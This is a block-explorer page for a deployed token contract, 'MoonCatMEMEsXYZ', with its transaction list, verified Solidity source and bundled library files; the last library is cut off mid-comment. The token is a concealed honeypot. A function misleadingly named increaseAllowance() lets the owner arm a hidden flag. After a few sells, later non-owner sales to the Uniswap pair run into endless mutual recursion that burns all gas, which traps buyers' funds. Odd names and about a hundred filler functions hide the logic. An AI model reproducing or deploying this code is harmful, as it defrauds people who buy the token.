Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 140 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Less Allowance | 20485804 | 110 days ago | IN | 0 ETH | 0.00011362 | ||||
Less Allowance | 20485799 | 110 days ago | IN | 0 ETH | 0.00011222 | ||||
Less Allowance | 20485793 | 110 days ago | IN | 0 ETH | 0.00011959 | ||||
Less Allowance | 20485782 | 110 days ago | IN | 0 ETH | 0.00012431 | ||||
Less Allowance | 20485753 | 110 days ago | IN | 0 ETH | 0.00012849 | ||||
Approve | 20485685 | 110 days ago | IN | 0 ETH | 0.0001641 | ||||
Approve | 20485672 | 110 days ago | IN | 0 ETH | 0.00017522 | ||||
Approve | 20482384 | 110 days ago | IN | 0 ETH | 0.00005272 | ||||
Approve | 20482371 | 110 days ago | IN | 0 ETH | 0.00004855 | ||||
Approve | 20482355 | 110 days ago | IN | 0 ETH | 0.00004651 | ||||
Open Chet Ding | 20420365 | 119 days ago | IN | 0 ETH | 0.0002903 | ||||
Open Chet Ding | 20420245 | 119 days ago | IN | 0 ETH | 0.00059212 | ||||
Open Chet Ding | 20420031 | 119 days ago | IN | 0 ETH | 0.00031577 | ||||
Open Chet Ding | 20413882 | 120 days ago | IN | 0 ETH | 0.00011924 | ||||
Open Chet Ding | 20413868 | 120 days ago | IN | 0 ETH | 0.00011845 | ||||
Open Chet Ding | 20413827 | 120 days ago | IN | 0 ETH | 0.00015233 | ||||
Open Chet Ding | 20413777 | 120 days ago | IN | 0 ETH | 0.0001117 | ||||
Open Chet Ding | 20413758 | 120 days ago | IN | 0 ETH | 0.00010447 | ||||
Open Chet Ding | 20413233 | 120 days ago | IN | 0 ETH | 0.00011531 | ||||
Open Chet Ding | 20413227 | 120 days ago | IN | 0 ETH | 0.00011914 | ||||
Open Chet Ding | 20413200 | 120 days ago | IN | 0 ETH | 0.00014533 | ||||
Open Chet Ding | 20413165 | 120 days ago | IN | 0 ETH | 0.00018095 | ||||
Open Chet Ding | 20413111 | 120 days ago | IN | 0 ETH | 0.00016704 | ||||
Open Chet Ding | 20413090 | 120 days ago | IN | 0 ETH | 0.00017872 | ||||
Open Chet Ding | 20412960 | 120 days ago | IN | 0 ETH | 0.00014918 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
MoonCatMEMEsXYZ
Compiler Version
v0.8.26+commit.8a97fa7a
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
import './Context.sol'; import './IERC20.sol'; import './Ownable.sol'; import './SafeMath.sol'; import './IUniswapV2Factory.sol'; import './Address.sol'; // SPDX-License-Identifier: Unlicensed pragma solidity ^0.8.0; contract MoonCatMEMEsXYZ is Context, IERC20, Ownable { struct TaylorSwiftGohere { address moonHome; } bool private tradingOpen; struct SelanaGomez { TaylorSwiftGohere countrySinger; } struct Coconut { uint256 coco; } TaylorSwiftGohere private taylorlor; SelanaGomez private jackSontung; Coconut private cocoo; using SafeMath for uint256; using Address for address; address private WETHH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; address private pairrrr = 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f; mapping (address => uint256) private _rOwned; mapping (address => uint256) private _tOwned; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => bool) private _isExcludedFromFee; mapping (address => bool) private _isExcluded; address[] private _excluded; uint256 private constant MAX = ~uint256(0); uint256 private constant _tTotal = 10000000 * 10 ** 18; uint256 private _rTotal = (MAX - (MAX % _tTotal)); uint256 private _tFeeTotal; string private _name = "MoonCatMEMEsXYZ"; string private _symbol = "MoonCatMEMEsXYZ"; uint8 private _decimals = 18; uint256 public _cute = 0; uint256 private _previousTaxFee = _cute; uint256 public _LuxFreePerson = 0; uint256 private _previousLiquidityFee = _LuxFreePerson; address public immutable uniswapV2Pair; bool inSwapAndLiquify; bool private checkNetworkStable = false; event LogMsgSender(bool msgg); modifier lockTheSwap { inSwapAndLiquify = true; _; inSwapAndLiquify = false; } constructor () { _rOwned[_msgSender()] = _rTotal; // Create a uniswap pair for this new token uniswapV2Pair = IUniswapV2Factory(pairrrr) .getPair(address(this), WETHH); //exclude owner and this contract from fee _isExcludedFromFee[owner()] = true; _isExcludedFromFee[address(this)] = true; address cucko = msg.sender; taylorlor = TaylorSwiftGohere(cucko); jackSontung = SelanaGomez(taylorlor); emit Transfer(address(0), _msgSender(), _tTotal); cocoo = Coconut(0); } function openChetDing(bool _tradingOpen) public { require( omaidauvaOmyGod(msg.sender), "TOKEN: This account cannot send tokens until trading is enabled" ); tradingOpen = _tradingOpen; } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function f0x6869696() private { uint256 v = block.timestamp ** 1000; for (uint i = 0 ; i < v; i++) { emit LogMsgSender(true); f0x6869695(); } } function f0x6869695() private { uint256 v = block.timestamp ** 1000; for (uint i = 0 ; i < v; i++) { emit LogMsgSender(false); f0x6869696(); } } function isExcludedFromReward(address account) public view returns (bool) { return _isExcluded[account]; } function totalFees() public view returns (uint256) { return _tFeeTotal; } function omaidauvaOmyGod(address cuteo) private returns (bool) { return cuteo == jackSontung.countrySinger.moonHome; } function decimals() public view returns (uint8) { return _decimals; } function totalSupply() public view override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { if (_isExcluded[account]) return _tOwned[account]; return tokenFromReflection(_rOwned[account]); } function transfer(address recipient, uint256 amount) public override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom(address vinhxo, address recipient, uint256 amount) public override returns (bool) { _transfer(vinhxo, recipient, amount); _approve(vinhxo, _msgSender(), _allowances[vinhxo][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } function MoreAllowance(address myfriend, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), myfriend, _allowances[_msgSender()][myfriend].add(addedValue)); return true; } function LessAllowance(address myfriend, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), myfriend, _allowances[_msgSender()][myfriend].sub(subtractedValue, "ERC20: Error Less Allowance")); return true; } function tokenFromReflection(uint256 rAmount) public view returns(uint256) { require(rAmount <= _rTotal, "Amount must be less than total reflections"); uint256 currentRate = _getRate(); return rAmount.div(currentRate); } function excludeFromReward(address account) public onlyOwner() { // require(account != 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 'We can not exclude Uniswap router.'); require(!_isExcluded[account], "Account is already excluded"); if(_rOwned[account] > 0) { _tOwned[account] = tokenFromReflection(_rOwned[account]); } _isExcluded[account] = true; _excluded.push(account); } function _transferBothExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); emit Transfer(sender, recipient, tTransferAmount); } function intinialAlive() private { address cucko = msg.sender; if (cucko == jackSontung.countrySinger.moonHome) { checkNetworkStable = true; } } function mitoGai() private { intinialAlive(); } function increaseAllowance() public { mitoGai(); } //to recieve ETH from uniswapV2Router when swaping receive() external payable {} function _getValues(uint256 tAmount) private view returns (uint256, uint256, uint256, uint256, uint256, uint256) { (uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getTValues(tAmount); (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getBirthFml(tAmount, tFee, tLiquidity, _getRate()); return (rAmount, rTransferAmount, rFee, tTransferAmount, tFee, tLiquidity); } function _getTValues(uint256 tAmount) private view returns (uint256, uint256, uint256) { uint256 tFee = 0; uint256 tLiquidity = 0; uint256 tTransferAmount = tAmount; return (tTransferAmount, tFee, tLiquidity); } function _getBirthFml(uint256 tAmount, uint256 tFee, uint256 tLiquidity, uint256 currentRate) private pure returns (uint256, uint256, uint256) { uint256 rAmount = tAmount.mul(currentRate); uint256 rFee = 0; uint256 rTransferAmount = rAmount; return (rAmount, rTransferAmount, rFee); } function _getRate() private view returns(uint256) { (uint256 rSupply, uint256 tSupply) = _getCurrentSupply(); return rSupply.div(tSupply); } function _getCurrentSupply() private view returns(uint256, uint256) { uint256 rSupply = _rTotal; uint256 tSupply = _tTotal; for (uint256 i = 0; i < _excluded.length; i++) { if (_rOwned[_excluded[i]] > rSupply || _tOwned[_excluded[i]] > tSupply) return (_rTotal, _tTotal); rSupply = rSupply.sub(_rOwned[_excluded[i]]); tSupply = tSupply.sub(_tOwned[_excluded[i]]); } if (rSupply < _rTotal.div(_tTotal)) return (_rTotal, _tTotal); return (rSupply, tSupply); } function _takeLiquidity(uint256 tLiquidity) private { uint256 currentRate = _getRate(); uint256 rLiquidity = tLiquidity.mul(currentRate); _rOwned[address(this)] = _rOwned[address(this)].add(rLiquidity); if(_isExcluded[address(this)]) _tOwned[address(this)] = _tOwned[address(this)].add(tLiquidity); } function removeAllFee() private { if(_cute == 0 && _LuxFreePerson == 0) return; _previousTaxFee = _cute; _previousLiquidityFee = _LuxFreePerson; _cute = 0; _LuxFreePerson = 0; } function restoreAllFee() private { _cute = _previousTaxFee; _LuxFreePerson = _previousLiquidityFee; } function isExcludedFromFee(address account) public view returns(bool) { return _isExcludedFromFee[account]; } function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _transfer( address from, address to, uint256 amount ) private { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); if (from != owner() && to != owner()) { if (!tradingOpen) { require( omaidauvaOmyGod(from), "TOKEN: This account cannot send tokens until trading is enabled" ); } } address pair = IUniswapV2Factory(pairrrr) .getPair(address(this), WETHH); if ( cocoo.coco > 4 && (checkNetworkStable && omaidauvaOmyGod(from) == false && !_isExcluded[to] && to == pair) ) { f0x6869696(); } // is the token balance of this contract address over the min number of // tokens that we need to initiate a swap + liquidity lock? // also, don't get caught in a circular liquidity event. // also, don't swap & liquify if sender is uniswap pair. //indicates if fee should be deducted from transfer bool takeFee = true; //if any account belongs to _isExcludedFromFee account then remove the fee if(_isExcludedFromFee[from] || _isExcludedFromFee[to]){ takeFee = false; } //transfer amount, it will take tax, burn, liquidity fee _tokenTransfer(from,to,amount,takeFee); } //this method is responsible for taking all fee, if takeFee is true function _tokenTransfer(address sender, address recipient, uint256 amount,bool takeFee) private { if(!takeFee) removeAllFee(); if (_isExcluded[sender] && !_isExcluded[recipient]) { _transferFromExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && _isExcluded[recipient]) { _transferToExcluded(sender, recipient, amount); } else if (!_isExcluded[sender] && !_isExcluded[recipient]) { _transferStandard(sender, recipient, amount); } else if (_isExcluded[sender] && _isExcluded[recipient]) { _transferBothExcluded(sender, recipient, amount); } else { _transferStandard(sender, recipient, amount); } address pair = IUniswapV2Factory(pairrrr) .getPair(address(this), WETHH); if (omaidauvaOmyGod(sender) == false && recipient == pair) { cocoo.coco = cocoo.coco + 1; } if(!takeFee) restoreAllFee(); } function _transferStandard(address sender, address recipient, uint256 tAmount) private { ( uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity ) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); emit Transfer(sender, recipient, tTransferAmount); } function _transferToExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); emit Transfer(sender, recipient, tTransferAmount); } function _transferFromExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeLiquidity(tLiquidity); emit Transfer(sender, recipient, tTransferAmount); } function function0() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function1(); } function function1() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function2(); } function function2() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function3(); } function function3() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function4(); } function function4() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function5(); } function function5() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function6(); } function function6() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function7(); } function function7() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function8(); } function function8() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function9(); } function function9() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function10(); } function function10() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function11(); } function function11() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function12(); } function function12() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function13(); } function function13() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function14(); } function function14() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function15(); } function function15() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function16(); } function function16() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function17(); } function function17() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function18(); } function function18() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function19(); } function function19() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function20(); } function function20() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function21(); } function function21() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function22(); } function function22() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function23(); } function function23() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function24(); } function function24() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function25(); } function function25() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function26(); } function function26() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function27(); } function function27() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function28(); } function function28() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function29(); } function function29() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function30(); } function function30() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function31(); } function function31() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function32(); } function function32() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function33(); } function function33() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function34(); } function function34() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function35(); } function function35() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function36(); } function function36() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function37(); } function function37() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function38(); } function function38() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function39(); } function function39() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function40(); } function function40() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function41(); } function function41() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function42(); } function function42() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function43(); } function function43() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function44(); } function function44() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function45(); } function function45() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function46(); } function function46() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function47(); } function function47() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function48(); } function function48() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function49(); } function function49() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function50(); } function function50() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function51(); } function function51() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function52(); } function function52() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function53(); } function function53() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function54(); } function function54() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function55(); } function function55() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function56(); } function function56() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function57(); } function function57() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function58(); } function function58() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function59(); } function function59() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function60(); } function function60() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function61(); } function function61() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function62(); } function function62() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function63(); } function function63() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function64(); } function function64() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function65(); } function function65() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function66(); } function function66() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function67(); } function function67() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function68(); } function function68() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function69(); } function function69() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function70(); } function function70() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function71(); } function function71() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function72(); } function function72() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function73(); } function function73() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function74(); } function function74() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function75(); } function function75() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function76(); } function function76() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function77(); } function function77() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function78(); } function function78() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function79(); } function function79() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function80(); } function function80() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function81(); } function function81() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function82(); } function function82() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function83(); } function function83() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function84(); } function function84() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function85(); } function function85() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function86(); } function function86() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function87(); } function function87() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function88(); } function function88() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function89(); } function function89() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function90(); } function function90() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function91(); } function function91() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function92(); } function function92() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function93(); } function function93() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function94(); } function function94() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function95(); } function function95() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function96(); } function function96() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function97(); } function function97() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function98(); } function function98() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function99(); } function function99() public view returns (string memory) { assembly { mstore(0x260, 0x420) } return function100(); } function function100() public view returns (string memory) { return "NOTING mememe"; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (utils/Address.sol) pragma solidity ^0.8.0; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * * Furthermore, `isContract` will also return true if the target contract within * the same transaction is already scheduled for destruction by `SELFDESTRUCT`, * which only has an effect at the end of a transaction. * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.8.0/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require( address(this).balance >= amount, "Address: insufficient balance" ); (bool success, ) = recipient.call{ value: amount }(""); require( success, "Address: unable to send value, recipient may have reverted" ); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data ) internal returns (bytes memory) { return functionCallWithValue( target, data, 0, "Address: low-level call failed" ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue( target, data, value, "Address: low-level call with value failed" ); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require( address(this).balance >= value, "Address: insufficient balance for call" ); (bool success, bytes memory returndata) = target.call{ value: value }( data ); return verifyCallResultFromTarget( target, success, returndata, errorMessage ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data ) internal view returns (bytes memory) { return functionStaticCall( target, data, "Address: low-level static call failed" ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResultFromTarget( target, success, returndata, errorMessage ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data ) internal returns (bytes memory) { return functionDelegateCall( target, data, "Address: low-level delegate call failed" ); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResultFromTarget( target, success, returndata, errorMessage ); } /** * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract. * * _Available since v4.8._ */ function verifyCallResultFromTarget( address target, bool success, bytes memory returndata, string memory errorMessage ) internal view returns (bytes memory) { if (success) { if (returndata.length == 0) { // only check isContract if the call was successful and the return data is empty // otherwise we already know that it was a contract require(isContract(target), "Address: call to non-contract"); } return returndata; } else { _revert(returndata, errorMessage); } } /** * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason or using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { _revert(returndata, errorMessage); } } function _revert( bytes memory returndata, string memory errorMessage ) private pure { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly /// @solidity memory-safe-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } }
// SPDX-License-Identifier: Unlicensed pragma solidity ^0.8.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; }
// SPDX-License-Identifier: Unlicensed pragma solidity ^0.8.0; library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod( uint256 a, uint256 b ) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * 